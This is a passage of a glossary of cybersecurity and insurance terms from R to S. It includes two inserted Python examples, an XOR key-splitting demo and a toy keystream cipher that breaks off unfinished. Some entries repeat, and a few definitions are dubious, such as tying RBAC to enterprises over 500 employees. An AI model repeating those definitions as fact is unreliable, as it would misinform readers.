Resource exhaustion is a kind of attack where the attacker or hacker ties up finite resources on a system, making them unavailable to others.
Response
A response is information sent in response to some stimulus.
Retention
A mechanism of internal fund allocation for loss exposure used in place of or as a supplement to risk transfer to an insurance company.
Retrocession
The portion of risk that a reinsurance company cedes or amount of insurance the company chooses not to retain.
Retrospective Rating
The process of determining the cost of an insurance policy based on the actual loss experience determined as an adjustment to the initial premium payment.
Reverse Address Resolution Protocol
Reverse Address Resolution Protocol (RARP) is a protocol where a physical machine in a local area network (LAN) can request to learn its IP address from a gateway server’s Address Resolution Protocol (ARP) table or cache. When a new machine is set up, its RARP client program requests from the RARP server on the router to be sent its IP address.
Reverse Engineering
Reverse engineering, also known as “back engineering”, is the process of extracting design information or any other kind of sensitive information by disassembling and analyzing the design of a system component.
Reverse Lookup
The Reverse Lookup is used to locate the hostname that corresponds to a particular IP address. Reverse lookup uses an IP (Internet Protocol) address to find a domain name.
Reverse Proxy
A reverse proxy is a device or service placed between a client and a server in a network. All incoming HTTP requests are handled by the proxy, which forwards them to the back-end web servers and then sends the content back to the end user.
RFC
A Request for Comments (RFC) is a type of publication from the Internet Engineering Task Force (IETF) and the Internet Society. An RFC is authored by engineers and computer scientists as a memorandum describing methods, behaviors, research, or innovations applicable to the working of the Internet and Internet-connected systems. RFCs started in 1969, when the Internet was the ARPANET.
Rider
An amendment to a policy agreement.
RIP
The Routing Information Protocol (RIP) defines a manner for routers to share information on how to route traffic among various networks. RIP is classified by the Internet Engineering Task Force (IETF) as an Interior Gateway Protocol (IGP), one of several protocols for routers moving traffic around within a larger autonomous system network.
Risk
Uncertainty concerning the possibility of loss by a peril for which insurance is pursued.
Risk Assessment
Risk assessment is a systematic process to analyze and identify any possible threats or risks that may leave sensitive information vulnerable to attacks. It also employs methods to calculate the risk impact and eliminate such threats.
Risk Averse
Risk averse means avoiding risks even if this leads to the loss of opportunity. For example, using a (more expensive) phone call instead of sending an e-mail, in order to avoid the risks associated with e-mail, may be considered “risk averse.”
Risk Based Capital Ratio
A ratio used to identify insurance companies that are poorly capitalized. It is calculated by dividing the company's capital by the minimum amount of capital regulatory authorities have deemed necessary to support the insurance operations.
Risk Retention Act
A 1986 federal statute amending portions of the Product Liability Risk Retention Act of 1981 and enacted to make organization of Risk Retention Groups and Purchasing Groups more efficient.
Risk Retention Group
Group-owned insurers organized to assume and spread the liability risks of their members.
Rivest-Shamir-Adleman
Rivest-Shamir-Adleman (RSA) is one of the first practical public-key cryptosystems and is widely used for secure data transmission. RSA is an algorithm for asymmetric cryptography, invented in 1977 by Ron Rivest, Adi Shamir, and Leonard Adleman. This is based on the practical difficulty of factoring the product of two large prime numbers, the factoring problem.
Role Based Access Control
Role based access control (RBAC) assigns users to roles based on their organizational functions and determines authorization based on those roles. It is used by enterprises with more than 500 employees, and can implement mandatory access control (MAC) or discretionary access control (DAC).
Root
Root is the username or account that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the super user.
Rootkit
A rootkit is a type of malware that gives a threat actor remote access to and control over a computer or other system.
Router
A router is a device that forwards or transfers data packets across networks. A router is connected to at least two networks, commonly two LANs or WANs or a LAN and its ISP’s network. Routers are located at gateways, the places where two or more networks connect.
Routing Information Protocol
The Routing Information Protocol (RIP) defines a manner for routers to share information on how to route traffic among various networks. RIP is classified by the Internet Engineering Task Force (IETF) as an Interior Gateway Protocol (IGP), one of several protocols for routers moving traffic around within a larger autonomous system network.
Routing Loop
A routing loop occurs when two or more poorly configured routers repeatedly exchange the same data packet. In the case of distance vector protocols, the fact that these protocols route by rumor and have a slow convergence time can cause routing loops.
RPC Scans
RPC scans determine which RPC services are running on a machine.
RSA
Rivest-Shamir-Adleman (RSA) is one of the first practical public-key cryptosystems and is widely used for secure data transmission. RSA is an algorithm for asymmetric cryptography, invented in 1977 by Ron Rivest, Adi Shamir, and Leonard Adleman. This is based on the practical difficulty of factoring the product of two large prime numbers, the factoring problem.
RSBAC
Rule Set Based Access Control (RSBAC) targets actions based on rules for entities operating on objects. RSBAC is an open-source access control framework for current Linux kernels, which has been in stable production use since January 2000.
Rule Set Based Access Control
Rule Set Based Access Control (RSBAC) targets actions based on rules for entities operating on objects. RSBAC is an open-source access control framework for current Linux kernels, which has been in stable production use since January 2000.
Runtime Protection
Runtime protection blocks attempts to access vulnerable parts of your computer.
S
S/Key
S/KEY is a one-time password mechanism developed for authentication to Unix-like operating systems, particularly from dumb terminals or untrusted public computers. This mechanism uses a cryptographic hash function to generate a sequence of 64-bit, one-time passwords for remote user login. Since each password is only used once, the user is protected from password sniffers.
S/MIME
S/MIME is a set of specifications for securing electronic mail. Secure/Multipurpose Internet Mail Extensions (S/MIME) is based upon the widely used MIME standard and describes a protocol for adding cryptographic security services through MIME encapsulation of digitally signed and encrypted objects. The basic security services offered by S/MIME are authentication, non-repudiation of origin, message integrity, and message privacy. Optional security services include signed receipts, security labels, secure mailing lists, and an extended method of identifying the signer’s certificate(s).
Safeguarding Statement
A safeguarding statement is a statement affixed to a computer output or printout that states the highest classification being processed at the time the product was produced and requires control of the product, at that level, until determination of the true classification by an authorized individual. Synonymous with banner.
Safeguards
Safeguards are protective measures prescribed to meet the security requirements (i.e., confidentiality, integrity, and availability) specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices. Synonymous with security controls and countermeasures.
Safety
Safety is defined as the requirement to ensure that the individuals involved with an organization, including employees, customers, and visitors, are safeguarded from any kind of malicious act or attack.
Salt
Salt is a non-secret value that is used in a cryptographic process, usually to ensure that the results of computations for one instance cannot be reused by an attacker.
Salvage
Value recoverable after a loss.
Sandboxing
Sandboxing is a method of isolating application modules into distinct fault domains enforced by software.
Sanitization
Sanitization is the process of removing information from media such that information recovery is not possible. It includes removing all labels, markings, and activity logs. In general terms, it refers to the actions taken to render data written on media unrecoverable by both ordinary and, for some forms of sanitization, extraordinary means.
Scanning
Scanning is sending packets or requests to another system to gain information to be used in a subsequent attack.
Scatternet
Scatternet is a chain of piconets created by allowing one or more Bluetooth devices to each be a slave in one piconet and act as the master for another piconet simultaneously. A scatternet allows several devices to be networked over an extended distance.
Scavenging
Scavenging is the process of searching through data residue in a system or a network to gain unauthorized knowledge of sensitive information.
Scoping Guidance
Scoping guidance is a part of tailoring guidance providing organizations with specific policy/regulatory-related, technology-related, system component allocation-related, operational/environmental-related, physical infrastructure-related, public access-related, scalability-related, common control-related, and security objective-related considerations on the applicability and implementation of individual security controls in the security control baseline. More briefly, it consists of specific factors related to technology, infrastructure, public access, scalability, common security controls, and risk that organizations can consider when deciding the applicability and implementation of individual security controls in the security control baseline.
Security Audit
A security audit is an evaluation of the security of a company's information system by measuring how well it conforms to a set of established criteria.
Script
A set of instructions that are interpreted by a program.
Secret Key
A secret key is a cryptographic key used with a secret-key (symmetric) cryptographic algorithm, uniquely associated with one or more entities, and not made public. It must be protected from unauthorized disclosure or substitution in order to protect the data encrypted with the key. The use of the term “secret” in this context does not imply a classification level; rather, it implies the need to protect the key from disclosure or substitution.
Secret Key (Symmetric) Cryptographic Algorithm
A secret key (symmetric) cryptographic algorithm is a cryptographic algorithm that uses a single key (i.e., a secret key) for both encryption and decryption.
Secret Seed
A secret seed is a secret value used to initialize a pseudorandom number generator.
Secure Communication Protocol
Secure Communication Protocol is a communication protocol that provides the appropriate confidentiality, authentication, and content-integrity protection.
Secure Communications
Secure Communications are telecommunications deriving security through NSA-approved products and/or Protected Distribution Systems. Configuring and operating DNS servers so that the security goals of data integrity and source authentication are achieved and maintained.
Secure Electronic Transactions
A Secure Electronic Transaction (SET) is a communications protocol standard for securing credit card transactions over insecure networks. SET authenticates all parties (customer, merchant, and bank) using digital signatures, protects the message and provides integrity using encryption, and provides end-to-end security for credit card transactions online.
Secure Erase
Secure erase is an overwrite technology that uses a firmware-based process to overwrite a hard drive. It is a drive command defined in the ANSI ATA and SCSI disk drive interface specifications, which runs inside the drive hardware. It completes in about 1/8 the time of 5220 block erasure.
Secure Hash Algorithm
Secure Hash Algorithm (SHA) is a hash algorithm with the property that it is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest.
Secure Hash Standard
The Secure Hash Standard specifies secure hash algorithms (SHA-1, SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224 and SHA-512/256) for computing a condensed representation of electronic data (a message). When a message of any length less than 2^64 bits (for SHA-1, SHA-224 and SHA-256) or less than 2^128 bits (for SHA-384, SHA-512, SHA-512/224 and SHA-512/256) is input to a hash algorithm, the result is an output called a message digest. The message digests range in length from 160 to 512 bits, depending on the algorithm. Secure hash algorithms are typically used with other cryptographic algorithms, such as digital signature algorithms and keyed-hash message authentication codes, or in the generation of random numbers (bits). The hash algorithms specified in this standard are called secure because, for a given algorithm, it is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest. Any change to a message will, with extremely high probability, result in a different message digest, which causes a verification failure when the secure hash algorithm is used with a digital signature algorithm or a keyed-hash message authentication algorithm. In short, a secure hash standard is a specification for a secure hash algorithm that generates a condensed message representation called a message digest.
Secure Socket Shell
Software that allows administrators to securely access a remote computer.
Secure Sockets Layer
SSL, or Secure Sockets Layer, is the standard security protocol for establishing encrypted communication between a web server and a browser.
Secure Sockets Layer
A Secure Sockets Layer (SSL) is the standard security technology for establishing an encrypted link between a web server and a browser. SSL was developed by Netscape for transmitting private documents via the Internet.
Secure State
A secure state is a condition in which no subject can access any object in an unauthorized manner.
Secure Subsystem
A secure subsystem is a subsystem containing its own implementation of the reference monitor concept for those resources it controls. A secure subsystem must depend on other controls and the base operating system for the control of subjects and the more primitive system objects.
Securitization of Insurance Risk
A method for insurance companies to access capital and hedge risks by converting policies into securities that can be sold in financial markets.
Security Association
A Security Association is a relationship established between two or more entities to enable them to protect data they exchange.
Security Attribute
A Security Attribute is a security-related quality of an object. Security attributes may be represented as hierarchical levels, bits in a bit map, or numbers. Compartments, caveats, and release markings are examples of security attributes. A security attribute is also an abstraction representing the basic properties or characteristics of an entity with respect to safeguarding information; typically associated with internal data structures (e.g., records, buffers, files) within the information system which are used to enable the implementation of access control and flow control policies; reflect special dissemination, handling, or distribution instructions; or support other aspects of the information security policy.
Security Authorization Boundary
A security authorization boundary is an information security area that includes a grouping of tools, technologies, and data.
Security Banner
A security banner is a banner at the top or bottom of a computer screen that states the overall classification of the system in large, bold type. A security banner can also refer to the opening screen that informs users of the security implications of accessing a computer resource.
Security Categorization
Security categorization is the process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS 199 for other than national security systems.
Security Category
Security category is the characterization of information, or an information system, based on an assessment of the potential impact that a loss of confidentiality, integrity, or availability of such information or information system would have on organizational operations, organizational assets, or individuals; the broader definition also includes the impact on other organizations and the Nation.
Security Concept of Operations
Security Concept of Operations is a security-focused description of an information system, its operational policies, classes of users, interactions between the system and its users, and the system’s contribution to the operational mission.
Security Control Assessment
Security Control Assessment is the testing and/or evaluation of the management, operational, and technical security controls in an information system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system and/or enterprise.
Security Control Assessor
A Security Control Assessor is the individual, group, or organization responsible for conducting a security control assessment.
Security Control Baseline
A Security Control Baseline is one of the sets of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system. For federal information systems, these baselines are defined in NIST Special Publication 800-53 and CNSS Instruction 1253.
Security Control Effectiveness
Security Control Effectiveness is the measure of correctness of implementation (i.e., how consistently the control implementation complies with the security plan) and how well the security plan meets organizational needs in accordance with current risk tolerance.
Security Control Enhancements
Security Control Enhancements are statements of security capability that 1) build in additional, but related, functionality to a basic security control and/or 2) increase the strength of that control.
Security Control Inheritance
Security Control Inheritance is a situation in which an information system or application receives protection from security controls (or portions of security controls) that are developed, implemented, assessed, authorized, and monitored by entities other than those responsible for the system or application; entities either internal or external to the organization where the system or application resides. See Common Control.
Security Controls
Security Controls are the management, operational, and technical controls (i.e., safeguards or countermeasures) prescribed for an information system to protect the confidentiality, integrity, and availability of the system and its information.
Security Controls Baseline
Security Controls Baseline is the set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system.
Security Domain
A Security Domain is a set of subjects, their information objects, and a common security policy. It is also described as a collection of entities to which a single security policy, executed by a single authority, applies: a domain that implements a security policy and is administered by a single authority.
Security Engineering
Security Engineering is an interdisciplinary approach and means to enable the realization of secure systems. It focuses on defining customer needs, security protection requirements, and required functionality early in the systems development life cycle, documenting requirements, and then proceeding with design, synthesis, and system validation while considering the complete problem.
Security Fault Analysis
Security Fault Analysis is an assessment, usually performed on information system hardware, to determine the security properties of a device when hardware fault is encountered.
Security Features Users Guide
A Security Features Users Guide (SFUG) is a guide or manual explaining how the security mechanisms in a specific system work.
Security Filter
Security Filter is a secure subsystem of an information system that enforces security policy on the data passing through it.
Security Functions
Security Functions are the hardware, software, and/or firmware of the information system responsible for enforcing the system security policy and supporting the isolation of code and data on which the protection is based.
Security Goals
Security Goals are the five goals of confidentiality, availability, integrity, accountability, and assurance.
Security Impact Analysis
Security Impact Analysis is the analysis conducted by an organizational official to determine the extent to which changes to the information system have affected its security state.
Security Information and Event Management
Security information and event management (SIEM) is an approach to security management that combines SIM (security information management) and SEM (security event management) functions into one security management system.
Security Inspection
A security inspection is the examination of an information system to determine compliance with security policy, procedures, and practices.
Security Kernel
A security kernel is the hardware, firmware, and software elements of a trusted computing base that implement the reference monitor concept. A security kernel must mediate all accesses, be protected from modification, and be verifiable as correct.
Security Label
A security label is a marking bound to a resource (which may be a data unit) that names or designates the security attributes of that resource; that is, information that represents or designates the value of one or more security-relevant attributes (e.g., classification) of a system resource.
Security Level
A security level is a hierarchical indicator of the degree of sensitivity to a certain threat. It implies, according to the security policy being enforced, a specific level of protection.
Security Management Dashboard
A security management dashboard is a tool that consolidates and communicates information relevant to the organizational security posture in near real time to security management stakeholders.
Security Marking
A security marking is human-readable information affixed to information system components, removable media, or output indicating the distribution limitations, handling caveats, and applicable security markings.
Security Markings
Security markings are human-readable indicators applied to a document, storage media, or hardware component to designate security classification, categorization, and/or handling restrictions applicable to the information contained therein. For intelligence information, security markings could include compartment and sub-compartment indicators and handling restrictions.
Security Mechanism
A security mechanism is a device designed to provide one or more security services usually rated in terms of strength of service and assurance of the design.
Security Net Control Station
A security net control station is a management system overseeing and controlling implementation of network security policy.
Security Objective
A security objective pertains to confidentiality, integrity, or availability.
SET
Secure Electronic Transaction (SET) is a communications protocol standard for securing credit card transactions over insecure networks. SET ensures that all parties (customer, merchant, and bank) are authenticated using digital signatures, that encryption protects the message and provides integrity, and that end-to-end security is provided for online credit card transactions.
SFA
Security Fault Analysis is an assessment, usually performed on information system hardware, to determine the security properties of a device when hardware fault is encountered.
SHA
Secure Hash Algorithm (SHA) is a hash algorithm with the property that it is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest.
SIEM
Security information and event management (SIEM) is an approach to security management that combines SIM (security information management) and SEM (security event management) functions into one security management system.
SSH
Secure Shell (SSH) is software that allows administrators to securely access a remote computer.
SSL
SSL, or Secure Sockets Layer, is the standard security protocol for establishing an encrypted communication channel between a web server and a client such as a browser.
Security Perimeter
A security perimeter is a physical or logical boundary defined for a system, domain, or enclave, within which a specified security policy or security architecture is applied.
Security Plan
A security plan is a formal document that provides an overview of the security requirements for an information system or an information security program and describes the security controls in place or planned for meeting those requirements.
Security Policy
A security policy is a document that contains a rule or set of rules and procedures for all users accessing and using an organization's IT assets and resources.
Security Posture
Security posture is the security status of an enterprise's networks, information, and systems, based on IA resources (e.g., people, hardware, software, policies) and the capabilities in place to manage the defense of the enterprise and to react as the situation changes.
Security Program Plan
A security program plan is a formal document that provides an overview of the security requirements for an organization-wide information security program and describes the program management security controls and common security controls in place or planned for meeting those requirements.
Security Range
A security range is the highest and lowest security levels permitted in or on an information system, system component, subsystem, or network.
Security-Relevant Change
A security-relevant change is any change to a system's configuration, environment, information content, functionality, or users that has the potential to change the risk imposed on its continued operation.
Security-Relevant Event
A security-relevant event is an occurrence (e.g., an auditable event or flag) considered to have potential security implications for the system or its environment that may require further action (noting, investigating, or reacting).
Security-Relevant Information
Security-relevant information is any information within the information system that can potentially impact the operation of security functions in a manner that could result in failure to enforce the system security policy or to maintain isolation of code and data.
Security Requirements
Security requirements are requirements levied on an information system that are derived from applicable laws, Executive Orders, directives, policies, standards, instructions, regulations, or procedures, or organizational mission/business case needs to ensure the confidentiality, integrity, and availability of the information being processed, stored, or transmitted.
Security Requirements Baseline
Security requirements baseline is the description of the minimum requirements necessary for an information system to maintain an acceptable level of risk.
Security Requirements Traceability Matrix
A Security Requirements Traceability Matrix (SRTM) is a matrix that captures all security requirements linked to potential risks and addresses all applicable C&A requirements. It is therefore a correlation statement of a system's security features and compliance methods for each security requirement.
Security Safeguards
Security safeguards are protective measures and controls prescribed to meet the security requirements specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices.
Security Service
A security service is a capability that supports one or more of the security goals or security requirements (confidentiality, integrity, availability). Examples of security services are key management, access control, and authentication.
Security Specification
Security specification is the detailed description of the safeguards required to protect an information system.
Security Strength
Security strength is a measure of the computational complexity associated with recovering certain secret and/or security-critical information concerning a given cryptographic algorithm from known data (e.g., plaintext/ciphertext pairs for a given encryption algorithm). It is also a number associated with the amount of work (that is, the number of operations) that is required to break a cryptographic algorithm or system. Sometimes referred to as a security level.
Security Tag
A security tag is an information unit containing a representation of certain security related information (e.g., a restrictive attribute bit map).
Security Target
A security target is a Common Criteria specification that represents a set of security requirements to be used as the basis of an evaluation of an identified Target of Evaluation (TOE).
Security Testing
Security Testing is the process to determine that an information system protects data and maintains functionality as intended.
Seed Key
A seed key is an initial key used to start an updating or key generation process.
Segment
A segment is the name for a TCP packet (the unit of data that TCP hands to IP). In a different sense, dividing an Ethernet into multiple segments is one of the most common ways of increasing available bandwidth on the LAN.
Sensitive Information
Sensitive information is data that must be protected from unauthorized access to safeguard the privacy or security of an individual, organization, or nation. Information sensitivity is the control of access to information or knowledge that might result in loss of an advantage or level of security, if disclosed to others.
Separate Account
Segregated funds held and invested independently of other assets by an insurer for a group retirement fund.
Separation of Duties
Separation of duties (SoD) is also known as “Segregation of duties.” It is based on the principle of splitting privileges among multiple individuals or systems.
Server
A server is a computer entity or a machine that waits for requests from other machines or software (clients) and responds to them. The purpose of a server is to share data or hardware and software resources among clients.
Session
A session is a virtual connection between two hosts by which network traffic is passed. It is a way to store information (in variables) to be used across multiple pages.
Session Hijacking
Session hijacking is also known as cookie hijacking. It is the exploitation of a valid computer session, sometimes also called a session key, to gain unauthorized access to sensitive information or services in a computer system or network.
Session Key
A session key is a key that is temporary or is used for a relatively brief period of time. It is an encryption and decryption key that is randomly generated to ensure the security of a communications session between a user and another computer or between two computers. These keys are sometimes called symmetric keys because the same key is used for both encryption and decryption.
SHA1
Secure Hash Algorithm 1 (SHA-1) is a cryptographic hash function designed by the United States National Security Agency and is a U.S. Federal Information Processing Standard published by the United States NIST.
Shadow Password Files
Shadow password files are system files where encrypted user passwords are stored so that they aren't available to people who try to break into the system.
Share
A share is any resource made public on a system or network, such as a directory (file share) or printer (printer share).
Shell
Shell is a user interface for access to an operating system's services.
Signals Analysis
Signals Analysis is a process of gaining indirect knowledge of communicated data by monitoring and analyzing a signal that is emitted by a system and that contains the data but is not intended to communicate the data.
Signature
A signature is like a fingerprint or a pattern that can be used to detect and identify malware.
Simple Integrity Property
In Simple Integrity Property, a user cannot write data to a higher integrity level than their own.
Simple Network Management Protocol
Simple Network Management Protocol (SNMP) is an Internet-standard protocol for managing devices on IP networks. Devices that typically support SNMP include routers, switches, servers, workstations, printers, modem racks and more. SNMP is widely used in network management systems to monitor network-attached devices for conditions that warrant administrative attention.
Simple Security Property
In Simple Security Property, a user cannot read data of a higher classification than their own.
Situs of Contract
The jurisdiction in which the contract is issued or delivered as stated in the contract.
Smartcard
A smart card is an electronic badge that includes a magnetic strip or chip that can record and replay a set key. The card connects to a reader with direct physical contact or with a remote contactless radio frequency interface.
Smurf Attack
A Smurf Attack is a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim’s spoofed source IP are broadcast to a computer network using an IP broadcast address. Most devices on a network respond to this by sending a reply to the source IP address. This can slow down the victim’s computer to the point where it becomes impossible to work on.
Sniffer
A sniffer monitors network traffic received in a network interface.
Sniffing
Sniffing is also known as passive wiretapping. Packet sniffing allows individuals to capture data as it is transmitted over a network. Packet sniffer programs are used by network professionals to diagnose network issues and by malicious users to capture unencrypted data like passwords and usernames in network traffic. Once this information is captured, the user can then gain access to the system or network.
SNMP
Simple Network Management Protocol (SNMP) is an Internet-standard protocol for managing devices on IP networks. Devices that typically support SNMP include routers, switches, servers, workstations, printers, modem racks and more. SNMP is widely used in network management systems to monitor network-attached devices for conditions that warrant administrative attention.
Social Engineering
Social engineering is a method of manipulating people, via phone, email, or in person, to gain confidential information or unauthorized access.
Social Networking
Social networking websites allow you to communicate and share information. But they can also be used to spread malware and to steal personal information.
Socket
A socket is an end point for communication between two systems. The socket tells a host’s IP stack where to plug in a data stream so that it connects to the right application.
Socket Pair
A Socket Pair is a way to uniquely specify a connection, i.e., source IP address, source port, destination IP address, destination port.
SOCKS
Socket Secure (SOCKS) is an Internet protocol that routes network or data packets between a client and server through a proxy server. SOCKS ensures proper authentication of users and allows authorized users only to access a server. SOCKS uses sockets to represent and keep track of individual connections. The client side of SOCKS is built into certain Web browsers and the server side can be added to a proxy server.
Soft Market
A buyer's market characterized by abundant supply of insurance driving premiums down.
Software
Software is any computer instructions, data, or programs that can be stored electronically and executed by computer hardware. While running any software, associated data that is stored in the hardware may be dynamically written or modified.
Source Port
A source port is a port that a host uses to connect to a server. It is usually a number greater than or equal to 1024. It is randomly generated and is different each time a connection is established.
SRTM
A Security Requirements Traceability Matrix (SRTM) is a matrix that captures all security requirements linked to potential risks and addresses all applicable C&A requirements. It is, therefore, a correlation statement of a system's security features and compliance methods for each security requirement.
SAP
A set of accounting principles set forth by the National Association of Insurance Commissioners is used to prepare statutory financial statements for insurance companies.
Spam
Spam consists of unsolicited messages, usually commercial, sent to many recipients via email, text message, or Internet postings.
Spam Filter
A spam filter is a program for detecting and blocking unsolicited email on a network.
Spanning Port
A spanning port is a switch port configured so that the switch behaves like a hub for that specific port.
Spear Phishing
Spear phishing is a phishing attack that targets specific users to persuade people in an organization to reveal critical data or credentials.
Split Horizon
A Split Horizon is an algorithm used to prevent routing loops in distance-vector routing protocols by prohibiting a router from advertising a route back onto the interface from which it was learned.
Split Key
A Split key is a cryptographic key that is divided into two or more separate data items that individually convey no knowledge of the whole key or information that results from combining the items.
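As an added example (not part of this glossary), the following Python block shows the simplest split-key scheme: XOR secret splitting. All but one share are drawn at random, and the last share is chosen so that the XOR of every share reproduces the key. Any proper subset of shares is uniformly random, so a single custodian learns nothing about the key, which is exactly the property the definition above describes. The function names and the sample key are constructed for this illustration.

```python
import secrets


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR of two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("inputs must have equal length")
    return bytes(x ^ y for x, y in zip(a, b))


def split_key(key: bytes, n: int) -> list[bytes]:
    """Split `key` into n shares (an n-of-n XOR split).

    n-1 shares are uniformly random; the last share is chosen so that the
    XOR of all n shares equals the key. Any n-1 shares together are still
    uniformly random and therefore convey no knowledge of the key.
    """
    if n < 2:
        raise ValueError("need at least two shares")
    shares = [secrets.token_bytes(len(key)) for _ in range(n - 1)]
    last = key
    for share in shares:
        last = xor_bytes(last, share)
    shares.append(last)
    return shares


def combine_key(shares: list[bytes]) -> bytes:
    """Recover the key by XORing every share together."""
    if not shares:
        raise ValueError("no shares supplied")
    result = bytes(len(shares[0]))
    for share in shares:
        result = xor_bytes(result, share)
    return result


def demo() -> bool:
    """Split a constructed (non-secret) sample key three ways and check that
    all three shares recover it while two shares alone do not."""
    key = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed sample
    shares = split_key(key, 3)
    return combine_key(shares) == key and combine_key(shares[:2]) != key


if __name__ == "__main__":
    print("split/combine round-trip ok:", demo())
```

Because the scheme is n-of-n, losing any one share makes the key unrecoverable; threshold schemes (such as Shamir's secret sharing) trade that fragility for more complex arithmetic.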
Spoof
A Spoof is an attack attempt by an unauthorized entity or attacker to gain illegitimate access to a system by posing as an authorized user.
Spoofing Email
Email spoofing is the forging of an email's sender address for social engineering purposes.
Spyware
Spyware is a type of malware that’s secretly installed on a device. In most cases, spyware tracks and relays user activities such as keystrokes and browsing behavior.
SQL Injection
SQL Injection or SQLi refers to an injection attack wherein an attacker executes malicious Structured Query Language (SQL) statements on a web application’s database server to gain access or make changes to the data.
Stack Smashing
Stack smashing is used to cause a stack in a computer application or operating system to overflow. This makes it possible to weaken the program or system or cause it to crash. The stack is also called a pushdown stack or first-in, last-out structure. It is a buffer that holds the intermediate results of an operation or data awaiting processing.
Standard ACLs (Cisco)
Standard Access Control Lists (ACLs) are essentially a set of commands, grouped together by a number or name that is used to filter traffic entering or leaving an interface. ACLs make packet filtering decisions based on Source IP address only.
Standard Risk
A person who, according to a company's underwriting standards, is considered a normal risk and insurable at standard rates. High or low risk candidates may qualify for extra or discounted rates based on their deviation from the standard.
Star Network
Star networks are one of the most common computer network topologies. A star network consists of a central node (a switch, hub, or computer) to which all other nodes are connected; the central node acts as a conduit that transmits messages and provides a common connection point for all nodes.
Star Property
Under the star property, a user cannot write data to a lower classification level than their own without logging in at that lower classification level.
State Machine
A state machine is any device that stores the status of something at a given time and can operate on input to change the status and cause an action to take place for any given change. A computer is basically a state machine, and each machine instruction is input that changes one or more states and may cause other actions to take place. Each computer’s data register stores a state. The read-only memory from which a boot program is loaded stores a state.
State of Domicile
The state where a company's home office is located.
State Page
Exhibit of Premiums and Losses for each state a company is licensed. The state of domicile receives a schedule for each jurisdiction the company wrote direct business, or has amounts paid, incurred or unpaid.
Stateful Inspection
Stateful inspection, also referred to as dynamic packet filtering, is a type of packet filtering that helps to control how data packets move through a firewall.
Statement Type
Refers to the primary business type under which the company files its annual and quarterly statement, such as Life, Property, Health, Fraternal, Title.
Statement Value
The Statutory Accounting Principal book value reduced by any valuation allowance and non-admitted adjustment applied to an individual investment or a similar group of investments, e.g., bonds, mortgage loans, common stock.
Static Host Tables
Static host tables are text files that contain hostnames and address mapping.
Static Routing
Static routing is a form of routing in which a router uses a manually configured routing entry rather than information from a dynamic routing protocol. Static routing can also be used in stub networks, or to provide a gateway of last resort.
Statutory Accounting
Method of accounting standards and principles used by state regulatory authorities to measure the financial condition of regulated companies and other insurance enterprises. This method tends to be more conservative than the Generally Accepted Accounting Principles used by most businesses. Compliance with solvency and other standards is determined using financial documents prepared in accordance with Statutory Accounting Principles.
Statutory Accounting Principles
A set of accounting principles set forth by the National Association of Insurance Commissioners is used to prepare statutory financial statements for insurance companies.
Stealthing
Stealthing is a term that refers to approaches used by malicious code to conceal its presence on the infected system.
Steganalysis
Steganalysis is the study of detecting and defeating the use of steganography. This is analogous to cryptanalysis applied to cryptography.
Steganography
Steganography is a technique used to hide the existence of a message, files, or any other information. The first recorded use of the term was in 1499 by Johannes Trithemius in his Steganographia. This is different from cryptography, which hides the meaning of a message but does not hide the message itself. An example of a steganographic method is invisible ink.
Stimulus
Stimulus is network traffic that initiates a connection or solicits a response.
Store-and-Forward
Store-and-Forward is a telecommunications technique in which information is sent to an intermediate station where it is kept and sent at a later time to the final destination or to another intermediate station.
Straight-Through Cable
A straight-through cable is a type of twisted pair cable that is used in local area networks to connect a computer to a network hub such as a router. This type of cable is also sometimes called a patch cable and is an alternative to wireless connections where one or more computers access a router through a wireless signal.
Stream Cipher
A stream cipher is a symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit stream. In a stream cipher, each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a digit of ciphertext stream.
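As an added example (not part of this glossary), the Python block below shows the stream-cipher structure the definition describes: a keystream is generated from a key and a nonce, and each plaintext byte is XORed with the corresponding keystream byte. The keystream generator here is an illustrative counter-mode construction over SHA-256, written for this example only; it is not a standardised cipher and real systems should use a vetted one such as ChaCha20. The last function demonstrates the classic failure mode a defender must watch for: reusing the same key and nonce for two messages lets anyone XOR the two ciphertexts and obtain the XOR of the plaintexts.

```python
import hashlib


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR of two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("inputs must have equal length")
    return bytes(x ^ y for x, y in zip(a, b))


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Illustrative keystream: concatenated SHA-256(key || nonce || counter) blocks.

    This is a toy generator for demonstration, not a standardised cipher.
    """
    out = bytearray()
    counter = 0
    while len(out) < length:
        block = hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        out.extend(block)
        counter += 1
    return bytes(out[:length])


def stream_encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Encrypt by XORing each plaintext byte with the matching keystream byte."""
    return xor_bytes(plaintext, keystream(key, nonce, len(plaintext)))


# XOR is its own inverse, so decryption is the same operation.
stream_decrypt = stream_encrypt


def keystream_reuse_leak(key: bytes, nonce: bytes, p1: bytes, p2: bytes) -> bool:
    """Return True if encrypting two messages under the same key and nonce lets
    an observer recover p1 XOR p2 from the ciphertexts alone (it always does)."""
    c1 = stream_encrypt(key, nonce, p1)
    c2 = stream_encrypt(key, nonce, p2)
    return xor_bytes(c1, c2) == xor_bytes(p1, p2)


if __name__ == "__main__":
    # Constructed sample key, nonce and messages for the demonstration.
    k, n = b"\x01" * 32, b"\x02" * 12
    ct = stream_encrypt(k, n, b"meet at noon")
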